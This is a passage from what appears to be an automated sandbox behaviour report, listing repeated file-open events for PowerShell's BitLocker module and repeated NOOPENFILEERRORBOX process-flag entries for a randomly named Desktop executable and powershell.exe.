Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
